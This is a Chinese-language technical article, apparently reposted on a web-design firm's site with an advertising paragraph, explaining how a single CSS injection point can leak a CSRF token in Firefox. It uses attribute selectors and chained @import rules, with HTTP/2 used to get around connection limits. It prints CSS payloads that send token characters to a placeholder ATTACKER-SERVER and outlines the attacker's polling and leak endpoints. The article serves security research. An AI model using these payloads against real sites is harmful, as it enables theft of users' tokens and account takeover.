怎么利用單一注入點從Firefox瀏覽器中提取CSS數據

這篇文章主要介紹了怎么利用單一注入點從Firefox瀏覽器中提取CSS數據，具有一定借鑒價值，感興趣的朋友可以參考下，希望大家閱讀完這篇文章之后大有收獲，下面讓小編帶著大家一起了解一下。

站在用戶的角度思考問題，與客戶深入溝通，找到羅莊網站設計與羅莊網站推廣的解決方案，憑借多年的經驗，讓設計與互聯網技術結合，創造個性化、用戶體驗好的作品，建站類型包括：成都做網站、成都網站建設、企業官網、英文網站、手機端網站、網站推廣、申請域名、網站空間、企業郵箱。業務覆蓋羅莊地區。

基礎技術和現有技術

在我們的演示樣例中，假設我們想獲取<input>元素中的CSRF令牌：

<input type="hidden" name="csrftoken" value="SOME_VALUE">

可能是由于內容安全策略的原因，這里我們無法使用腳本來實現這個目的，因此我們嘗試尋找基于樣式的注入點。一般來說，我們會選擇使用屬性選擇器：

input[name='csrftoken'][value^='a'] {  background: url(//ATTACKER-SERVER/leak/a);}input[name='csrftoken'][value^='b'] {  background: url(//ATTACKER-SERVER/leak/b);}...input[name='csrftoken'][value^='z'] {  background: url(//ATTACKER-SERVER/leak/z);}

如果這里部署了CSS規則，那么攻擊者就可以獲取一個HTTP請求，然后提取令牌的第一個字符。接下來，攻擊者需要準備另一個樣式表，其中需要包含已竊取的第一個字符：

input[name='csrftoken'][value^='aa'] {  background: url(//ATTACKER-SERVER/leak/aa);}input[name='csrftoken'][value^='ab'] {  background: url(//ATTACKER-SERVER/leak/ab);}...input[name='csrftoken'][value^='az'] {  background: url(//ATTACKER-SERVER/leak/az);}

此時，攻擊者需要重新加載目標頁面中的<iframe>以提供后續的樣式表。

在2018年，Pepe Vila提供了一種利用CSS遞歸導入的方式實現在Chrome瀏覽器中的單一注入點利用技術。而在2019年，Nathanial Lattimer（@d0nutptr）基于該技術重新提出了一種改進方案，這種技術比較適用于本文針對Firefox瀏覽器的場景。

在第一次注入時，我們需要用到大量import：

@import url(//ATTACKER-SERVER/polling?len=0);@import url(//ATTACKER-SERVER/polling?len=1);@import url(//ATTACKER-SERVER/polling?len=2);...

該技術的運行機制如下：

首先，在一開始只有第一個@import會返回一個樣式表，其他語句處于連接阻塞狀態。此時，第一個@import返回目標樣式表，其中包含了令牌的第一個字符。接下來，當泄露的第一個令牌抵達攻擊者的服務器端ATTACKER-SERVER之后，第二個@import將停止阻塞，并返回包含令牌第一個字符的樣式表，然后嘗試獲取令牌中的第二個字符。最后，當第二個泄露字符到達攻擊者的服務器端ATTACKER-SERVER之后，第三個@import將停止阻塞……以此類推。

這種技術之所以有效，是因為Chrome會采用異步方式處理@import，因此當任何@import停止阻塞時，Chrome會立即解析該語句并應用執行。

Firefox與樣式表處理

跟Chrome相比，Firefox針對樣式表的處理方式完全不同。首先，Firefox會采用同步方式處理樣式表。因此，當樣式表中有多個@import時，只有當所有@import都處理完畢時CSS規則才會被應用。比如說：

<style>@import '/polling/0';@import '/polling/1';@import '/polling/2';</style>

假設第一個@import返回CSS規則時，會將頁面背景設置為藍色，后面的@import將處于阻塞狀態。在Chrome中，頁面會立即變成藍色，但是在Firefox中卻不會有任何反應。

此時，我們可以將所有的@import單獨放在<style>元素中：

<style>@import '/polling/0';</style><style>@import '/polling/1';</style><style>@import '/polling/2';</style>

在上述代碼中，Firefox會分別處理所有的樣式表，此時Firefox中的頁面會立刻變藍色，其他的@import會在后臺進行處理。

不過這里還有一個問題，比如說我們想竊取包含10個字符的令牌：

<style>@import '/polling/0';</style><style>@import '/polling/1';</style><style>@import '/polling/2';</style>...<style>@import '/polling/10';</style>

Firefox會立即將10個@import加入隊列。在處理完第一個@import之后，Firefox會將帶有已知字符的另一個請求加入隊列。問題就在于，該請求會被追加到隊尾處。在默認情況下，瀏覽器跟同一個服務器只能建立六條并發鏈接。因此，帶有已知字符的請求永遠不會到達目標服務器，因為該服務器已經有六條阻塞鏈接了，此時便會發生死鎖。

解決方案：HTTP/2

六條并發鏈接的限制是由TCP層決定的，因此單臺服務器同時只能存在六條TCP鏈接。而HTTP/2的其中一個優勢就在于，它支持通過單個鏈接來發送多個HTTP請求（即多路復用），從而大大提升網絡性能。

但是，Firefox針對單個HTTP/2連接的并發請求數也有限制，默認配置下限制數量為100條。如果需要使用更多的并發鏈接，則需要使用不同的主機名來設置，并強制Firefox創建第多條TCP鏈接。

比如說，如果我們創建到https://localhost:3000的100個請求，然后又創建到https://127.0.0.1:3000的50個請求，那么Firefox就會創建兩條TCP鏈接。

利用技術

技術利用場景如下：

1、代碼基于HTTP/2實現；
2、“/polling/:session/:index”節點會返回一個CSS并泄露第“:index”個字符。該請求會處于阻塞狀態，直到前一個請求成功泄露第“:index-1”個字符為止。其中，“:session”路徑參數用來區分多次攻擊行為。
3、通過“/leak/:session/:value”節點來獲取完整的令牌，這里的“:value”即為獲取到的完整令牌值。
4、為了強制Firefox向同一個服務器發起兩條TCP鏈接，這里用到了兩個節點，即https://localhost:3000和https://127.0.0.1:3000。
5、使用“/generate”節點來生成樣本代碼。